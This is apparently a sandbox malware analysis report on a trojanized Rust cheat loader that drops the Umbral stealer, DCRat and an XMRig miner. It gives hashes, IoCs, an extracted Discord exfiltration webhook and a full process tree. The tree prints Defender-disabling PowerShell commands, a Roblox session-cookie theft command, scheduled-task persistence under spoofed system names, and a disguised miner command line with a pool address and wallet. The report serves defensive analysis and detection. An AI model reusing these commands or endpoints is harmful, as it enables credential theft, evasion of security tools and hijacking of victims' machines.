umbral | aebdb5d4472f019df13190b233c6dd89050b7f473c0828c97c16f060e458b573

Analysis

max time kernel
8s
max time network
305s
platform
windows7_x64
resource
win7-20240704-en
resource tags

arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
submitted
23-07-2024 12:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

LoaderAlkadRustCheat.exe
Size

64.1MB
MD5

73ffcfac6161cd6c7a8b1d001a0aaaf4
SHA1

be16bed3401bd838c4b85a47ae184d4a08a28fe3
SHA256

aebdb5d4472f019df13190b233c6dd89050b7f473c0828c97c16f060e458b573
SHA512

5d5677aeab8bdb9d908a7dafbd7424912cc3f28a2e90d2b39929aec8153a87820f67d13389c6d8cb2e2661735df74d1b7c4f27812e871555717f3922b195e4ca
SSDEEP

786432:8yrqMu/IZ53ufBoglmM/zxhkAw7BwNLmf7CfuBqFiKKL+XNnwlHAsdwelhFVWQuO:NIWtgf7sAEZ7CHSi5s1DCQ6XEeO

Score

10^/10

umbral xmrig execution miner stealer

Malware Config

Extracted

Family

umbral

https://discordapp.com/api/webhooks/1263829716222087238/q6iXEGwIgQyM0U64TvXijRw1r9Pjb2LfSfDMR3sTEuliB-bO89WTL5urDXmvBpgYvif-

Signatures

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral1/files/0x0009000000015d05-5.dat	family_umbral
behavioral1/memory/2840-9-0x00000000010A0000-0x00000000010E0000-memory.dmp	family_umbral

Process spawned unexpected child process 18 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2184	2696	schtasks.exe	44
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1712	2696	schtasks.exe	44
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	352	2696	schtasks.exe	44
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1932	2696	schtasks.exe	44
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2188	2696	schtasks.exe	44
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2772	2696	schtasks.exe	44
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1676	2696	schtasks.exe	44
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1480	2696	schtasks.exe	44
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2356	2696	schtasks.exe	44
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2296	2696	schtasks.exe	44
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2628	2696	schtasks.exe	44
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2644	2696	schtasks.exe	44
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2664	2696	schtasks.exe	44
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	976	2696	schtasks.exe	44
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2260	2696	schtasks.exe	44
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	344	2696	schtasks.exe	44
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2108	2696	schtasks.exe	44
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2092	2696	schtasks.exe	44

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 17 IoCs

miner

resource	yara_rule
behavioral1/memory/884-210-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/884-209-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/884-206-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/884-204-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/884-202-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/884-200-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/884-198-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/884-234-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/884-233-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/884-232-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/884-231-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/884-227-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/884-196-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/884-194-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/884-192-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/884-190-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/884-242-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig

Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2724	powershell.exe
1904	powershell.exe
2724	powershell.exe
2720	powershell.exe
2848	powershell.exe
1232	powershell.exe
2740	powershell.exe

Executes dropped EXE 4 IoCs

pid	Process
2840	Umbral.exe
2416	loader.exe
3068	DCRatBuild.exe
2640	1.exe

Loads dropped DLL 2 IoCs

pid	Process
2248	LoaderAlkadRustCheat.exe
2248	LoaderAlkadRustCheat.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
7	raw.githubusercontent.com
8	raw.githubusercontent.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
19	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2932	wmic.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
696	taskkill.exe

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery

T1018

pid	Process
1656	PING.EXE
1416	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 20 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2260	schtasks.exe
2184	schtasks.exe
1712	schtasks.exe
2772	schtasks.exe
976	schtasks.exe
2644	schtasks.exe
2092	schtasks.exe
2300	schtasks.exe
1932	schtasks.exe
1676	schtasks.exe
1480	schtasks.exe
2324	schtasks.exe
2664	schtasks.exe
344	schtasks.exe
2628	schtasks.exe
2108	schtasks.exe
352	schtasks.exe
2188	schtasks.exe
2356	schtasks.exe
2296	schtasks.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2840	Umbral.exe

Suspicious use of WriteProcessMemory 17 IoCs

description	pid	Process	procid_target
PID 2248 wrote to memory of 2840	2248	LoaderAlkadRustCheat.exe	28
PID 2248 wrote to memory of 2840	2248	LoaderAlkadRustCheat.exe	28
PID 2248 wrote to memory of 2840	2248	LoaderAlkadRustCheat.exe	28
PID 2248 wrote to memory of 2416	2248	LoaderAlkadRustCheat.exe	29
PID 2248 wrote to memory of 2416	2248	LoaderAlkadRustCheat.exe	29
PID 2248 wrote to memory of 2416	2248	LoaderAlkadRustCheat.exe	29
PID 2248 wrote to memory of 3068	2248	LoaderAlkadRustCheat.exe	30
PID 2248 wrote to memory of 3068	2248	LoaderAlkadRustCheat.exe	30
PID 2248 wrote to memory of 3068	2248	LoaderAlkadRustCheat.exe	30
PID 2248 wrote to memory of 3068	2248	LoaderAlkadRustCheat.exe	30
PID 3068 wrote to memory of 2544	3068	DCRatBuild.exe	80
PID 3068 wrote to memory of 2544	3068	DCRatBuild.exe	80
PID 3068 wrote to memory of 2544	3068	DCRatBuild.exe	80
PID 3068 wrote to memory of 2544	3068	DCRatBuild.exe	80
PID 2248 wrote to memory of 2640	2248	LoaderAlkadRustCheat.exe	83
PID 2248 wrote to memory of 2640	2248	LoaderAlkadRustCheat.exe	83
PID 2248 wrote to memory of 2640	2248	LoaderAlkadRustCheat.exe	83

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
316	attrib.exe

C:\Users\Admin\AppData\Local\Temp\LoaderAlkadRustCheat.exe
"C:\Users\Admin\AppData\Local\Temp\LoaderAlkadRustCheat.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2248
- C:\Users\Admin\AppData\Local\Temp\Umbral.exe
  "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2840
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:676
- - C:\Windows\system32\attrib.exe
    "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
    3⤵
    - Views/modifies file attributes
    PID:316
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:2724
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    PID:2312
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    PID:2708
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    PID:2300
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" os get Caption
    3⤵
    PID:2596
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" computersystem get totalphysicalmemory
    3⤵
    PID:1988
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:1500
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    3⤵
    PID:900
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic" path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:2932
- - C:\Windows\system32\cmd.exe
    "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
    3⤵
    PID:1320
  - - C:\Windows\system32\PING.EXE
      ping localhost
      4⤵
      Runs ping.exe
      PID:1416
- C:\Users\Admin\AppData\Local\Temp\loader.exe
  "C:\Users\Admin\AppData\Local\Temp\loader.exe"
  2⤵
  - Executes dropped EXE
  PID:2416
- - C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
    "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
    3⤵
    PID:2456
- - C:\Users\Admin\AppData\Local\Temp\1.exe
    "C:\Users\Admin\AppData\Local\Temp\1.exe"
    3⤵
    PID:596
  - - C:\Windows\System32\conhost.exe
      "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\1.exe"
      4⤵
      PID:1784
    - - C:\Windows\System32\cmd.exe
        
        "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
        5⤵
        
        PID:2960
      - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2300
    - - C:\Windows\System32\cmd.exe
        
        "cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"
        5⤵
        
        PID:2312
      - C:\Users\Admin\AppData\Roaming\services64.exe
        
        C:\Users\Admin\AppData\Roaming\services64.exe
        6⤵
        
        PID:1416
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"
        7⤵
        
        PID:2488
        
        C:\Windows\System32\cmd.exe
        
        "cmd" cmd /c taskkill /f /PID "1700"
        8⤵
        
        PID:2992
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /PID "1700"
        9⤵
        Kills process with taskkill
        
        PID:696
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        8⤵
        
        PID:2672
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "/sihost64"
        9⤵
        
        PID:1960
- - C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe
    "C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe"
    3⤵
    PID:1736
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\chainContainerproviderdriver\GFpm16CSowFgEy35TRHcwvj4Rm.vbe"
      4⤵
      PID:1892
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\chainContainerproviderdriver\uDyCMCiZHpa.bat" "
        5⤵
        
        PID:1976
      - C:\chainContainerproviderdriver\PortContainercomponentsavesdll.exe
        
        "C:\chainContainerproviderdriver/PortContainercomponentsavesdll.exe"
        6⤵
        
        PID:1704
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Bb5GAaqDbf.bat"
        7⤵
        
        PID:2556
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        8⤵
        
        PID:2288
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        8⤵
        Runs ping.exe
        
        PID:1656
        
        C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\schtasks.exe
        
        "C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\schtasks.exe"
        8⤵
        
        PID:1884
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\3IeSgqMHPu.bat"
        9⤵
        
        PID:2176
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        10⤵
        
        PID:2656
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        10⤵
        
        PID:2564
        
        C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\schtasks.exe
        
        "C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\schtasks.exe"
        10⤵
        
        PID:540
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\dYHSyFVcIa.bat"
        11⤵
        
        PID:1204
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        12⤵
        
        PID:1724
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        12⤵
        
        PID:1400
        
        C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\schtasks.exe
        
        "C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\schtasks.exe"
        12⤵
        
        PID:2728
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\FxA7ALGfVn.bat"
        13⤵
        
        PID:676
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        14⤵
        
        PID:2248
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        14⤵
        
        PID:2148
        
        C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\schtasks.exe
        
        "C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\schtasks.exe"
        14⤵
        
        PID:3068
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\cKtIWeAP2w.bat"
        15⤵
        
        PID:448
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        16⤵
        
        PID:2552
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        16⤵
        
        PID:928
        
        C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\schtasks.exe
        
        "C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\schtasks.exe"
        16⤵
        
        PID:236
- C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe
  "C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3068
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\ProviderDriverRef\eJD3VG.vbe"
    3⤵
    PID:2544
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\ProviderDriverRef\fAwipI.bat" "
      4⤵
      PID:2488
    - - C:\ProviderDriverRef\providerIntoCrtcommon.exe
        
        "C:\ProviderDriverRef/providerIntoCrtcommon.exe"
        5⤵
        
        PID:2200
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lj1sc45x\lj1sc45x.cmdline"
        6⤵
        
        PID:1520
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE705.tmp" "c:\Windows\System32\CSC4D9BD928F8844DCE977BBF4AE4D897D.TMP"
        7⤵
        
        PID:1980
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\5ba42562-3a8b-11ef-9d17-d685e2345d05\Extreme Injector v3.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2740
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\NetHood\sppsvc.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1232
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Internet Explorer\ja-JP\WmiPrvSE.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2848
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\chainContainerproviderdriver\wininit.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2720
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\chainContainerproviderdriver\spoolsv.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2724
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProviderDriverRef\providerIntoCrtcommon.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1904
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\DfUzOw7aQ3.bat"
        6⤵
        
        PID:928
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        7⤵
        
        PID:2792
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        7⤵
        
        PID:2012
        
        C:\Recovery\5ba42562-3a8b-11ef-9d17-d685e2345d05\Extreme Injector v3.exe
        
        "C:\Recovery\5ba42562-3a8b-11ef-9d17-d685e2345d05\Extreme Injector v3.exe"
        7⤵
        
        PID:2256
- C:\Users\Admin\AppData\Local\Temp\1.exe
  "C:\Users\Admin\AppData\Local\Temp\1.exe"
  2⤵
  - Executes dropped EXE
  PID:2640
- - C:\Windows\System32\conhost.exe
    "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\1.exe"
    3⤵
    PID:1584
  - - C:\Windows\System32\cmd.exe
      "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
      4⤵
      PID:2968
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2324
  - - C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
      "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
      4⤵
      PID:1968
    - - C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "/sihost64"
        5⤵
        
        PID:1700
  - - C:\Windows\explorer.exe
      C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:443 --user=445UV3m7uZw7vzcyJsS6YV6mctZdJzgKXWtU4NwucQNYfzPfuzdJ7LahEzkUx3aDrMAVDpEn1Cq8NSK9br8YqhhBAiWMTms --pass=100 --cpu-max-threads-hint=100 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=1 --cinit-idle-cpu=100 --nicehash --tls --cinit-stealth
      4⤵
      PID:884

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Extreme Injector v3E" /sc MINUTE /mo 14 /tr "'C:\Recovery\5ba42562-3a8b-11ef-9d17-d685e2345d05\Extreme Injector v3.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2184

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Extreme Injector v3" /sc ONLOGON /tr "'C:\Recovery\5ba42562-3a8b-11ef-9d17-d685e2345d05\Extreme Injector v3.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:352

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Extreme Injector v3E" /sc MINUTE /mo 10 /tr "'C:\Recovery\5ba42562-3a8b-11ef-9d17-d685e2345d05\Extreme Injector v3.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1712

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 7 /tr "'C:\Users\Default\NetHood\sppsvc.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1932

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Users\Default\NetHood\sppsvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2092

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 13 /tr "'C:\Users\Default\NetHood\sppsvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2188

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 6 /tr "'C:\Program Files\Internet Explorer\ja-JP\WmiPrvSE.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2108

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Program Files\Internet Explorer\ja-JP\WmiPrvSE.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2772

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 5 /tr "'C:\Program Files\Internet Explorer\ja-JP\WmiPrvSE.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:344

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 5 /tr "'C:\chainContainerproviderdriver\wininit.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1676

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\chainContainerproviderdriver\wininit.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1480

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 10 /tr "'C:\chainContainerproviderdriver\wininit.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2260

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 11 /tr "'C:\chainContainerproviderdriver\spoolsv.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:976

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\chainContainerproviderdriver\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2356

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 8 /tr "'C:\chainContainerproviderdriver\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2664

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "providerIntoCrtcommonp" /sc MINUTE /mo 11 /tr "'C:\ProviderDriverRef\providerIntoCrtcommon.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2296

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "providerIntoCrtcommon" /sc ONLOGON /tr "'C:\ProviderDriverRef\providerIntoCrtcommon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2644

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "providerIntoCrtcommonp" /sc MINUTE /mo 13 /tr "'C:\ProviderDriverRef\providerIntoCrtcommon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2628

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-217517507-10360475461028209209112630645-825496872-1656914026-8091180491067397992"
1⤵
PID:2544

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-11668324431074435827638642152-1570099321809237921456454748-11346598991388720128"
1⤵
PID:2640

C:\Windows\system32\taskeng.exe
taskeng.exe {C4A3DB7B-0C37-41C1-810F-73446AFA558A} S-1-5-21-3434294380-2554721341-1919518612-1000:ELZYPTFV\Admin:Interactive:[1]
1⤵
PID:1700
- C:\chainContainerproviderdriver\wininit.exe
  C:\chainContainerproviderdriver\wininit.exe
  2⤵
  PID:2964

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProviderDriverRef\eJD3VG.vbe

Filesize
198B

MD5
51193c792f88b815ce62701eb62e79ac

SHA1
bc0611ed093ca2a4c8dd07fec6badaea820a3331

SHA256
774eb705ea6dc91eda9537d6c8e264458cdab74d91cb5f9534bf1aecfa58118b

SHA512
b05086f77e5aee92f79c1851e0665a3afd141abcba4596d5a2cc1f98702f9fe0ff8630dc2f8ab4a333eedb83902427bc4e975424b6a8cfa212d6d3f1315fcc40

Download Submit
C:\ProviderDriverRef\fAwipI.bat

Filesize
100B

MD5
